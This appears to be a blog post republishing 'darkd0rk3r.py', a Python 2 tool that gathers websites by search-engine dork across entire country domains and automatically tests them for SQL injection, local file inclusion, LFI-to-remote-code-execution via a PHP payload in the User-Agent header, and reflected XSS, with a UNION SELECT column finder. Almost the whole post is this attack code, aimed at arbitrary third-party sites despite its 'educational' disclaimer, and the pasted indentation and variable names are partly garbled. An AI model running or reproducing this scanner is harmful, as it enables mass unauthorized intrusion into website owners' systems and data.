15 Okt 2012

Scan Dork From Python

Hi guys,
:) 



001#!/usr/bin/python
002# This was written for educational purpose and pentest only. Use it at your own risk.
003# Author will be not responsible for any damage!
004# !!! Special greetz for my friend sinner_01 !!!
005# Toolname        : darkd0rk3r.py
006# Coder           : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
007# Version         : 0.8
008# Greetz for rsauron and low1z, great python coders
009# greetz for d3hydr8, r45c4l, qk, fx0, Soul, MikiSoft, c0ax, b0ne, tek0t and all members of ex darkc0de.com, ljuska.org
010#
011
012import string, sys, time, urllib2, cookielib, re, random, threading, socket, os, subprocess
013from random import choice
014
015# Colours
016= "\033[0m"
017= "\033[31m";
018= "\033[32m";
019= "\033[33m";
020= "\033[34m";
021
022
023# Banner
# Prints the coloured start-up banner. R and W are the ANSI colour escape
# strings assigned a few lines above (their variable names were lost in this
# paste: those lines begin with "=").
# NOTE(review): the print lines are indented inconsistently (4 then 8 spaces)
# as pasted, so this block would not parse verbatim.
024def logo():
025    print R+"\n|---------------------------------------------------------------|"
026        print "| b4ltazar[@]gmail[dot]com                                      |"
027        print "|   08/2012     darkd0rk3r.py  v.0.8                            |"
028        print "|    b4ltazar.wordpress.com    &   ljuska.org                   |"
029        print "|                                                               |"
030        print "|---------------------------------------------------------------|\n"
031    print W
032
033if sys.platform == 'linux' or sys.platform == 'linux2':
034  subprocess.call("clear", shell=True)
035  logo()
036   
037else:
038  subprocess.call("cls", shell=True)
039  logo()
040   
041log = "darkd0rk3r-sqli.txt"
042logfile = open(log, "a")
043lfi_log = "darkd0rk3r-lfi.txt"
044lfi_log_file = open(lfi_log, "a")
045rce_log = "darkd0rk3r-rce.txt"
046rce_log_file = open(rce_log, "a")
047xss_log = "darkd0rk3r-xss.txt"
048xss_log_file = open(xss_log, "a")
049
050threads = []
051finallist = []
052vuln = []
053col = []
054arg_end = "--"
055arg_eva = "+"
056colMax = 10
057gets = 0
058timeout = 300
059socket.setdefaulttimeout(timeout)
060
061
062
063            
064lfis = ["/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd","/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../etc/passwd","../../../../../../../../../../../../../etc/passwd"]
065
066xsses = ["<h1>XSS by baltazar</h1>","%3Ch1%3EXSS%20by%20baltazar%3C/h1%3E"]
067
068sqlerrors = {'MySQL': 'error in your SQL syntax',
069             'MiscError': 'mysql_fetch',
070             'MiscError2': 'num_rows',
071             'Oracle': 'ORA-01756',
072             'JDBC_CFM': 'Error Executing Database Query',
073             'JDBC_CFM2': 'SQLServer JDBC Driver',
074             'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
075             'MSSQL_Uqm': 'Unclosed quotation mark',
076             'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
077             'MS-Access_JETdb': 'Microsoft JET Database',
078             'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
079             'Server Error' : 'Server Error',
080             'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
081             'Invalid Querystring' : 'Invalid Querystring',
082             'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
083             'VBScript Runtime' : 'VBScript Runtime',
084             'ADODB.Field' : 'ADODB.Field',
085             'BOF or EOF' : 'BOF or EOF',
086             'ADODB.Command' : 'ADODB.Command',
087             'JET Database' : 'JET Database',
088             'mysql_fetch_array()' : 'mysql_fetch_array()',
089             'Syntax error' : 'Syntax error',
090             'mysql_numrows()' : 'mysql_numrows()',
091             'GetArray()' : 'GetArray()',
092             'FetchRow()' : 'FetchRow()',
093             'Input string was not in a correct format' : 'Input string was not in a correct format'}
094              
095
096header = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
097          'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
098          'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
099      'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
100      'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
101      'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
102      'Microsoft Internet Explorer/4.0b1 (Windows 95)',
103      'Opera/8.00 (Windows NT 5.1; U; en)',
104      'amaya/9.51 libwww/5.4.0',
105      'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
106      'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
107      'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
108      'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
109      'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
110      'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
111       
112       
113domains = {'All domains':['ac', 'ad', 'ae', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao',
114           'aq', 'ar', 'as', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb',
115           'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'bj', 'bm', 'bn', 'bo',
116           'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cc', 'cd',
117           'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'cr',
118           'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do',
119           'dz', 'ec', 'ee', 'eg', 'eh', 'er', 'es', 'et', 'eu', 'fi',
120           'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf',
121           'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gp', 'gq', 'gr', 'gs',
122           'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu',
123           'id', 'ie', 'il', 'im', 'in', 'io', 'iq', 'ir', 'is', 'it',
124           'je', 'jm', 'jo', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn',
125           'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk',
126           'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me',
127           'mg', 'mh', 'mk', 'ml', 'mm', 'mn', 'mo', 'mp', 'mq', 'mr',
128           'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'nc',
129           'ne', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz',
130           'om', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn',
131           'pr', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru',
132           'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj',
133           'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy',
134           'sz', 'tc', 'td', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm',
135           'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug',
136           'uk', 'um', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi',
137           'vn', 'vu', 'wf', 'ws', 'ye', 'yt', 'za', 'zm', 'zw', 'com',
138           'net', 'org','biz', 'gov', 'mil', 'edu', 'info', 'int', 'tel',
139           'name', 'aero', 'asia', 'cat', 'coop', 'jobs', 'mobi', 'museum',
140           'pro', 'travel'],'Balcan':['al', 'bg', 'ro', 'gr', 'rs', 'hr',
141           'tr', 'ba', 'mk', 'mv', 'me'],'TLD':['xxx','edu', 'gov', 'mil',
142           'biz', 'cat', 'com', 'int','net', 'org', 'pro', 'tel', 'aero', 'asia',
143           'coop', 'info', 'jobs', 'mobi', 'name', 'museum', 'travel']}
144            
145
146
147
148
149def search(inurl, maxc):
150  urls = []
151  for site in sitearray:
152    page = 0
153    try:
154      while page < int(maxc):
155    jar = cookielib.FileCookieJar("cookies")
156    query = inurl+"+site:"+site
157    results_web = 'http://www.search-results.com/web?q='+query+'&hl=en&page='+repr(page)+'&src=hmp'
158    request_web =urllib2.Request(results_web)
159    agent = random.choice(header)
160    request_web.add_header('User-Agent', agent)
161    opener_web = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
162    text = opener_web.open(request_web).read()
163    stringreg = re.compile('(?<=href=")(.*?)(?=")')
164        names = stringreg.findall(text)
165        page += 1
166        for name in names:
167      if name not in urls:
168        if re.search(r'\(',name) or re.search("<", name) or re.search("\A/", name) or re.search("\A(http://)\d", name):
169          pass
170        elif re.search("google",name) or re.search("youtube", name) or re.search("phpbuddy", name) or re.search("iranhack",name) or re.search("phpbuilder",name) or re.search("codingforums", name) or re.search("phpfreaks", name) or re.search("%", name) or re.search("facebook", name) or re.search("twitter", name):
171          pass
172        else:
173          urls.append(name)
174    percent = int((1.0*page/int(maxc))*100)
175    urls_len = len(urls)
176    sys.stdout.write("\rSite: %s | Collected urls: %s | Percent Done: %s | Current page no.: %s <> " % (site,repr(urls_len),repr(percent),repr(page)))
177    sys.stdout.flush()
178    except(KeyboardInterrupt):
179      pass
180  tmplist = []
181  print "\n\n[+] URLS (unsorted): ",len(urls)
182  for url in urls:
183    try:
184      host = url.split("/",3)
185      domain = host[2]
186      if domain not in tmplist and "=" in url:
187    finallist.append(url)
188    tmplist.append(domain)
189     
190    except:
191      pass
192  print "[+] URLS (sorted)  : ",len(finallist)
193  return finallist
194
195   
# Worker thread that calls ClassicINJ on each URL of the slice it was given.
# stop() clears self.check, which run() re-reads before every URL.
196class injThread(threading.Thread):
197        def __init__(self,hosts):
                # hosts: iterable of URLs assigned to this worker (copied in run()).
198                self.hosts=hosts
                # fcount is bumped once when the loop ends, not per URL.
199                self.fcount = 0
200                self.check = True
201                threading.Thread.__init__(self)
202
203        def run (self):
204                urls = list(self.hosts)
205                for url in urls:
206                        try:
207                                if self.check == True:
208                                        ClassicINJ(url)
209                                else:
210                                        break
                        # NOTE(review): KeyboardInterrupt is swallowed here, so a
                        # Ctrl-C raised inside the worker does not end the loop.
211                        except(KeyboardInterrupt,ValueError):
212                                pass
213                self.fcount+=1
214
215        def stop(self):
                # Cooperative stop: takes effect at the next loop iteration.
216                self.check = False
217                 
# Worker thread that calls ClassicLFI on each URL of the slice it was given.
# Identical in shape to injThread; stop() clears self.check, which run()
# re-reads before every URL.
218class lfiThread(threading.Thread):
219        def __init__(self,hosts):
                # hosts: iterable of URLs assigned to this worker (copied in run()).
220                self.hosts=hosts
                # fcount is bumped once when the loop ends, not per URL.
221                self.fcount = 0
222                self.check = True
223                threading.Thread.__init__(self)
224
225        def run (self):
226                urls = list(self.hosts)
227                for url in urls:
228                        try:
229                                if self.check == True:
230                                        ClassicLFI(url)
231                                else:
232                                        break
                        # NOTE(review): KeyboardInterrupt is swallowed here, so a
                        # Ctrl-C raised inside the worker does not end the loop.
233                        except(KeyboardInterrupt,ValueError):
234                                pass
235                self.fcount+=1
236
237        def stop(self):
                # Cooperative stop: takes effect at the next loop iteration.
238                self.check = False
239                 
# Worker thread that calls ClassicXSS on each URL of the slice it was given.
# Identical in shape to injThread; stop() clears self.check, which run()
# re-reads before every URL.
240class xssThread(threading.Thread):
241        def __init__(self,hosts):
                # hosts: iterable of URLs assigned to this worker (copied in run()).
242                self.hosts=hosts
                # fcount is bumped once when the loop ends, not per URL.
243                self.fcount = 0
244                self.check = True
245                threading.Thread.__init__(self)
246
247        def run (self):
248                urls = list(self.hosts)
249                for url in urls:
250                        try:
251                                if self.check == True:
252                                        ClassicXSS(url)
253                                else:
254                                        break
                        # NOTE(review): KeyboardInterrupt is swallowed here, so a
                        # Ctrl-C raised inside the worker does not end the loop.
255                        except(KeyboardInterrupt,ValueError):
256                                pass
257                self.fcount+=1
258
259        def stop(self):
                # Cooperative stop: takes effect at the next loop iteration.
260                self.check = False
261                 
262                 
263def ClassicINJ(url):
264        EXT = "'"
265        host = url+EXT
266        try:
267                source = urllib2.urlopen(host).read()
268                for type,eMSG in sqlerrors.items():
269                        if re.search(eMSG, source):
270                                print R+"[!] w00t!,w00t!:", O+host, B+"Error:", type,R+" ---> SQL Injection Found"
271                logfile.write("\n"+host)
272                vuln.append(host)
273                col.append(host)
274                break
275                 
276                 
277                        else:
278                                pass
279        except:
280                pass
281
282
283def ClassicLFI(url):
284  lfiurl = url.rsplit('=', 1)[0]
285  if lfiurl[-1] != "=":
286    lfiurl = lfiurl + "="
287  for lfi in lfis:
288    try:
289      check = urllib2.urlopen(lfiurl+lfi.replace("\n", "")).read()
290      if re.findall("root:x", check):
291    print R+"[!] w00t!,w00t!: ", O+lfiurl+lfi,R+" ---> Local File Include Found"
292    lfi_log_file.write("\n"+lfiurl+lfi)
293    vuln.append(lfiurl+lfi)
294    target = lfiurl+lfi
295    target = target.replace("/etc/passwd","/proc/self/environ")
296    header = "<? echo md5(baltazar); ?>"
297        try:
298      request_web = urllib2.Request(target)
299      request_web.add_header('User-Agent', header)
300      text = urllib2.urlopen(request_web)
301      text = text.read()
302      if re.findall("f17f4b3e8e709cd3c89a6dbd949d7171", text):
303        print R+"[!] w00t!,w00t!: ",O+target,R+" ---> LFI to RCE Found"
304        rce_log_file.write("\n",target)
305        vuln.append(target)
306        except:
307      pass
308     
309    except:
310      pass
311
312def ClassicXSS(url):
313  for xss in xsses:
314    try:
315      source = urllib2.urlopen(url+xss.replace("\n","")).read()
316      if re.findall("XSS by baltazar", source):
317    print R+"[!] w00t!,w00t!: ", O+url+xss,R+" ---> XSS Found (might be false)"
318    xss_log_file.write("\n"+url+xss)
319    vuln.append(url+xss)
320    except:
321      pass
322
# Splits the module-level usearch list into int(numthreads) slices, starts one
# injThread per slice, appends each to the module-level threads list and joins
# them all before returning. Reads usearch, numthreads and threads from module
# scope (set in the menu loop below).
323def injtest():
324  print B+"\n[+] Preparing for SQLi scanning ..."
325  print "[+] Can take a while ..."
326  print "[!] Working ...\n"
  # i = URLs per slice (integer division under Python 2), m = leftover URLs;
  # each of the first m slices receives one extra URL from the tail.
327  i = len(usearch) / int(numthreads)
328  m = len(usearch) % int(numthreads)
329  z = 0
  # NOTE(review): numthreads is the raw string from raw_input, so this compares
  # an int with a str (Python 2 cross-type ordering); presumably int(numthreads)
  # was intended. threads is only reset when the menu starts a new scan, so a
  # second run appends to and re-joins the previous workers.
330  if len(threads) <= numthreads:
331    for x in range(0, int(numthreads)):
332      sliced = usearch[x*i:(x+1)*i]
333      if (z<m):
334    sliced.append(usearch[int(numthreads)*i+z])
335    z +=1
336      thread = injThread(sliced)
337      thread.start()
338      threads.append(thread)
339    for thread in threads:
340      thread.join()
341       
# Same partitioning scheme as injtest, but starts lfiThread workers: usearch is
# split into int(numthreads) slices, one thread per slice, all appended to the
# module-level threads list and joined before returning.
342def lfitest():
343  print B+"\n[+] Preparing for LFI - RCE scanning ..."
344  print "[+] Can take a while ..."
345  print "[!] Working ...\n"
  # i = URLs per slice (integer division under Python 2), m = leftover URLs;
  # each of the first m slices receives one extra URL from the tail.
346  i = len(usearch) / int(numthreads)
347  m = len(usearch) % int(numthreads)
348  z = 0
  # NOTE(review): numthreads is the raw string from raw_input, so this compares
  # an int with a str (Python 2 cross-type ordering); presumably int(numthreads)
  # was intended. threads is only reset when the menu starts a new scan, so a
  # second run appends to and re-joins the previous workers.
349  if len(threads) <= numthreads:
350    for x in range(0, int(numthreads)):
351      sliced = usearch[x*i:(x+1)*i]
352      if (z<m):
353    sliced.append(usearch[int(numthreads)*i+z])
354    z +=1
355      thread = lfiThread(sliced)
356      thread.start()
357      threads.append(thread)
358    for thread in threads:
359      thread.join()
360
# Same partitioning scheme as injtest, but starts xssThread workers: usearch is
# split into int(numthreads) slices, one thread per slice, all appended to the
# module-level threads list and joined before returning.
361def xsstest():
362  print B+"\n[+] Preparing for XSS scanning ..."
363  print "[+] Can take a while ..."
364  print "[!] Working ...\n"
  # i = URLs per slice (integer division under Python 2), m = leftover URLs;
  # each of the first m slices receives one extra URL from the tail.
365  i = len(usearch) / int(numthreads)
366  m = len(usearch) % int(numthreads)
367  z = 0
  # NOTE(review): numthreads is the raw string from raw_input, so this compares
  # an int with a str (Python 2 cross-type ordering); presumably int(numthreads)
  # was intended. threads is only reset when the menu starts a new scan, so a
  # second run appends to and re-joins the previous workers.
368  if len(threads) <= numthreads:
369    for x in range(0, int(numthreads)):
370      sliced = usearch[x*i:(x+1)*i]
371      if (z<m):
372    sliced.append(usearch[int(numthreads)*i+z])
373    z +=1
374      thread = xssThread(sliced)
375      thread.start()
376      threads.append(thread)
377    for thread in threads:
378      thread.join()
379
380menu = True
381new = 1
382while menu == True:
383  if new == 1:
384    threads = []
385    finallist = []
386    vuln = []
387    col = []
388     
389    stecnt = 0
390    for k,v in domains.items():
391      stecnt += 1
392      print str(stecnt)+" - "+k
393    sitekey = raw_input("\nChoose your target   : ")
394    sitearray = domains[domains.keys()[int(sitekey)-1]]
395     
396
397    inurl = raw_input('\nEnter your dork      : ')
398    numthreads = raw_input('Enter no. of threads : ')
399    maxc = raw_input('Enter no. of pages   : ')
400    print "\nNumber of SQL errors :",len(sqlerrors)
401    print "Number of LFI paths  :",len(lfis)
402    print "Number of XSS cheats :",len(xsses)
403    print "Number of headers    :",len(header)
404    print "Number of threads    :",numthreads
405    print "Number of pages      :",maxc
406    print "Timeout in seconds   :",timeout
407    print ""
408   
409    usearch = search(inurl,maxc)
410    new = 0
411   
412  print R+"\n[0] Exit"
413  print "[1] SQLi Testing"
414  print "[2] SQLi Testing with Column Finder"
415  print "[3] LFI - RCE Testing"
416  print "[4] XSS Testing"
417  print "[5] SQLi and LFI - RCE Testing"
418  print "[6] SQLi and XSS Testing"
419  print "[7] LFI -RCE and XSS Testing"
420  print "[8] SQLi,LFI - RCE and XSS Testing"
421  print "[9] Save valid urls to file"
422  print "[10] Print valid urls"
423  print "[11] Found vuln in last scan"
424  print "[12] New Scan\n"
425   
426  chce = raw_input(":")
427  if chce == '1':
428    injtest()
429     
430  if chce == '2':
431    injtest()
432    print B+"\n[+] Preparing for Column Finder ..."
433    print "[+] Can take a while ..."
434    print "[!] Working ..."
435    # Thanks rsauron for schemafuzz
436    for host in col:
437      print R+"\n[+] Target: ", O+host
438      print R+"[+] Attempting to find the number of columns ..."
439      print "[+] Testing: ",
440      checkfor = []
441      host = host.rsplit("'", 1)[0]
442      sitenew = host+arg_eva+"and"+arg_eva+"1=2"+arg_eva+"union"+arg_eva+"all"+arg_eva+"select"+arg_eva
443      makepretty = ""
444      for x in xrange(0, colMax):
445    try:
446      sys.stdout.write("%s," % (x))
447      sys.stdout.flush()
448      darkc0de = "dark"+str(x)+"c0de"
449      checkfor.append(darkc0de)
450      if x > 0:
451        sitenew += ","
452      sitenew += "0x"+darkc0de.encode("hex")
453      finalurl = sitenew+arg_end
454      gets += 1
455      source = urllib2.urlopen(finalurl).read()
456      for y in checkfor:
457        colFound = re.findall(y, source)
458        if len(colFound) >= 1:
459          print "\n[+] Column length is:", len(checkfor)
460          nullcol = re.findall(("\d+"), y)
461          print "[+] Found null column at column #:", nullcol[0]
462          for z in xrange(0, len(checkfor)):
463        if z > 0:
464          makepretty += ","
465        makepretty += str(z)
466          site = host+arg_eva+"and"+arg_eva+"1=2"+arg_eva+"union"+arg_eva+"all"+arg_eva+"select"+arg_eva+makepretty
467          print "[+] SQLi URL:", site+arg_end
468          site = site.replace(","+nullcol[0]+",",",darkc0de,")
469          site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"darkc0de,")
470          site = site.replace(","+nullcol[0],",darkc0de")
471          print "[+] darkc0de URL:", site
472          print "[-] Done!\n"
473           
474    except(KeyboardInterrupt, SystemExit):
475      raise
476    except:
477      pass
478       
479      print "\n[!] Sorry column length could not be found\n"
480      ###########
481       
482       
483       
484  if chce == '3':
485    lfitest()
486   
487  if chce == '4':
488    xsstest()
489     
490  if chce == '5':
491    injtest()
492    lfitest()
493      
494  if chce == '6':
495    injtest()
496    xsstest()
497     
498  if chce == '7':
499    lfitest()
500    xsstest()
501     
502  if chce == '8':
503    injtest()
504    lfitest()
505    xsstest()
506     
507  if chce == '9':
508    print B+"\nSaving valid urls ("+str(len(finallist))+") to file"
509    listname = raw_input("Filename: ")
510    list_name = open(listname, "w")
511    finallist.sort()
512    for t in finallist:
513      list_name.write(t+"\n")
514    list_name.close()
515    print "Urls saved, please check", listname
516    
517  if chce == '10':
518    print W+"\nPrinting valid urls:\n"
519    finallist.sort()
520    for t in finallist:
521      print B+t
522       
523  if chce == '11':
524    print B+"\nVuln found ",len(vuln)
525     
526  if chce == '12':
527    new = 1
528    print W+""
529
530  if chce == '0':
531    print R+"\n[-] Exiting ..."
532    mnu = False
533    print W
534    sys.exit(1)










